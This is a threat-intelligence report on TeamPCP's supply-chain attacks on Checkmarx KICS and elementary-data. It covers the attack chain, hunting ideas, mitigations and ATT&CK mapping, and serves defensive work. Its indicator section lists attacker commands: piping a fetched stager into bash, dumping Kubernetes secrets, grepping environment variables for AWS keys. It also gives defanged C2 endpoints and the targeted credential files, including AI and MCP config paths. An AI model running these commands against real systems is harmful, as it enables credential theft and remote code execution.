Analyzing TeamPCP’s Supply Chain Attacks: Checkmarx KICS and elementary-data in CI/CD Credential Theft
TeamPCP (SHADOW-WATER-058) executed a sophisticated supply chain campaign compromising developer toolchains across multiple ecosystems, including Docker Hub, PyPI, and GitHub Actions. The attacks leveraged CI/CD trust, such as unsanitized PR comments and stolen publisher tokens, to distribute credential-harvesting payloads via Python .pth files and the Bun runtime, targeting over 80 credential types and abusing live AWS APIs.
Authors: Jacob Santos, John Rainier Navato
Source:
Trend Micro
- domainskyhanni[.]cloudelementary-data payload exfiltration C2 endpoint
- filename~/.claude.jsonTargeted AI config file for credential theft
- filename~/.kiro/settings/mcp.jsonTargeted MCP config file for credential theft
- urlhxxps://audit[.]checkmarx[.]cx/v1/telemetryKICS payload exfiltration C2 endpoint
- urlhxxps://litter[.]catbox[.]moe/iqesmbhukgd2c7hq.shelementary-data initial stager script injected via PR comment
Detection / HunterGoogle
What Happened
Cybercriminals known as TeamPCP successfully compromised several popular software development tools to steal sensitive passwords and access keys. They targeted systems used by developers, such as GitHub and Python package registries, by sneaking malicious code into trusted software updates. This is highly concerning because it allows the attackers to steal cloud credentials, database passwords, and even cryptocurrency directly from the developers' machines and automated systems. Organizations should immediately check if they downloaded the affected software versions, rotate any potentially exposed passwords, and secure their automated building processes against unauthorized commands.
Key Takeaways
- TeamPCP compromised multiple developer toolchains (Docker Hub, PyPI, VS Code, GitHub Actions) to distribute credential stealers.
- The elementary-data attack used a single unsanitized PR comment to inject a script, abusing the project's own CI to sign and publish a malicious package.
- The KICS attack used stolen npm tokens to hijack the @bitwarden/cli package within 24 hours.
- Payloads target over 80 credential paths, including cloud keys, SSH, developer tokens, and cryptocurrency wallets.
- The elementary-data stealer makes live AWS API calls (e.g., secretsmanager:ListSecrets) to enumerate and extract secrets beyond what is stored on disk.
Affected Systems
- GitHub Actions
- PyPI
- Docker Hub
- GHCR
- VS Code extensions
- Cloud-connected CI runners
- Python environments
- Bun runtime environments
Attack Chain
The attacker gained initial access by compromising publisher accounts or exploiting unsanitized pull request comments to inject malicious scripts into CI/CD pipelines. These scripts modified legitimate packages (like KICS and elementary-data) to include credential-stealing payloads executed via the Bun runtime or Python's .pth import mechanism. Once executed on a victim's machine or CI runner, the payloads harvested over 80 types of credentials, including cloud keys and SSH tokens, and abused live AWS APIs to enumerate secrets. The stolen data was then encrypted, compressed, and exfiltrated to attacker-controlled C2 servers using custom HTTP headers.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: TrendAI Vision One
TrendAI Vision One provides pattern-based and behavioral detections for Bun runtime execution, credential harvesting, and network inspection signatures for the custom exfiltration headers.
Detection Engineering Assessment
EDR Visibility: High — EDR can monitor process creation (Bun runtime, Python interpreter spawning shell commands), file creation (trin.tar.gz, .pth files), and command-line arguments used for reconnaissance. Network Visibility: High — The payloads use custom HTTP headers (e.g., X-Rise-To-The-Trinny: agree) and specific C2 domains for exfiltration, which are highly visible in network traffic inspection. Detection Difficulty: Moderate — While the initial supply chain compromise is hard to detect, the post-compromise behaviors (custom HTTP headers, Bun runtime execution in CI, live AWS API abuse from CI roles) provide strong, high-fidelity detection opportunities.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- File Creation (Sysmon Event ID 11)
- Network Connections (Sysmon Event ID 3)
- AWS CloudTrail
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for Python interpreter processes initiating outbound HTTPS connections at startup, which may indicate a malicious .pth file execution. | Process/Network | Execution/C2 | Low |
| If you have visibility into AWS CloudTrail, consider hunting for secretsmanager:ListSecrets or ssm:DescribeParameters events originating from CI/CD runner IAM roles. | CloudTrail | Discovery | Low |
| Consider hunting for the creation of trin.tar.gz or .trinny-security-update files in temporary directories. | File System | Collection/Persistence | Low |
| Consider hunting for outbound HTTP requests containing the custom header X-Rise-To-The-Trinny: agree or X-Filename: tpcp.tar.gz. | Network | Exfiltration | Very Low |
| Consider hunting for unexpected execution of the Bun runtime (bun or bun.exe) in CI agent environments or developer workstations. | Process | Execution | Medium |
Control Gaps
- Lack of network egress filtering on CI/CD runners
- Unsanitized input in GitHub Actions workflows
- Implicit trust in signed packages without verifying the build provenance
Key Behavioral Indicators
- Python processes making network connections at startup
- Custom HTTP headers in outbound traffic
- Unexpected AWS Secrets Manager API calls from CI roles
- Creation of Dune-themed GitHub repositories
False Positive Assessment
- Low. The specific custom HTTP headers, Dune-themed repository names, and targeted AWS API calls from CI roles are highly specific to this threat actor and unlikely to occur in benign environments.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- If applicable, treat any environment that pulled the affected checkmarx/kics Docker tags, VS Code extensions, or elementary-data==0.23.3 as fully compromised.
- Consider rotating all potentially exposed credentials from a clean host, including GitHub PATs, AWS/Azure/GCP keys, npm tokens, and SSH private keys.
- Evaluate whether to block the documented C2 domains and IPs at your network perimeter.
Infrastructure Hardening
- Consider applying strict network egress controls to CI agent environments to block outbound connections to non-allowlisted endpoints.
- Evaluate whether to pin all Docker image pulls to verified cryptographic digests rather than mutable tags.
- Consider auditing all GitHub Actions workflows for user-controlled expressions interpolated directly into run: blocks (e.g.,
${{ github.event.comment.body }}).
User Protection
- Consider upgrading to known-safe versions of the affected packages (e.g., elementary-data==0.23.4, @bitwarden/cli v2026.3.0).
- If your tooling supports it, monitor developer workstations for unexpected Bun runtime execution or anomalous Python startup behavior.
Security Awareness
- Consider training developers on the risks of supply chain attacks and the importance of verifying package integrity.
- Evaluate rolling out awareness on the dangers of unsanitized inputs in CI/CD pipelines, specifically in GitHub Actions.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1078 - Valid Accounts
- T1199 - Trusted Relationship
- T1059.007 - Command and Scripting Interpreter: JavaScript
- T1059.006 - Command and Scripting Interpreter: Python
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1547 - Boot or Logon Autostart Execution
- T1027 - Obfuscated Files or Information
- T1070.004 - Indicator Removal: File Deletion
- T1552.001 - Unsecured Credentials: Credentials In Files
- T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
- T1528 - Steal Application Access Token
- T1526 - Cloud Service Discovery
- T1613 - Container and Resource Discovery
- T1005 - Data from Local System
- T1530 - Data from Cloud Storage
- T1071.001 - Application Layer Protocol: Web Protocols
- T1102.001 - Dead Drop Resolver
- T1041 - Exfiltration Over C2 Channel
- T1567 - Exfiltration Over Web Service
- T1657 - Financial Theft
Additional IOCs
- Domains:
audit[.]checkmarx[.]cx- KICS payload exfiltration C2 endpointskyhanni[.]cloud- elementary-data payload exfiltration C2 endpoint
- Urls:
hxxps://litter[.]catbox[.]moe/iqesmbhukgd2c7hq.sh- elementary-data initial stager script injected via PR comment
- File Paths:
mcpAddon.js- KICS core payload executed via Bun runtimeelementary.pth- Malicious Python payload injected into elementary-datatrin.tar.gz- Compressed archive of stolen credentials.trinny-security-update- Persistence marker file left in temporary directory
- Command Lines:
- Purpose: Download and execute stager script via PR comment injection | Tools:
curl,bash| Stage: Initial Access / Execution |curl -sSL <url> | bash - Purpose: Enumerate Kubernetes secrets | Tools:
kubectl| Stage: Discovery |kubectl get secrets --all-namespaces - Purpose: Reconnaissance of SSH logins | Tools:
cat,grep,tail| Stage: Discovery |cat /var/log/auth.log | grep Accepted - Purpose: Search for AWS credentials in environment variables | Tools:
env,grep| Stage: Discovery |env | grep AWS_
- Purpose: Download and execute stager script via PR comment injection | Tools:
- Other:
Shai-Hulud: The Third Coming- Description of auto-created public GitHub repositories used for dead-drops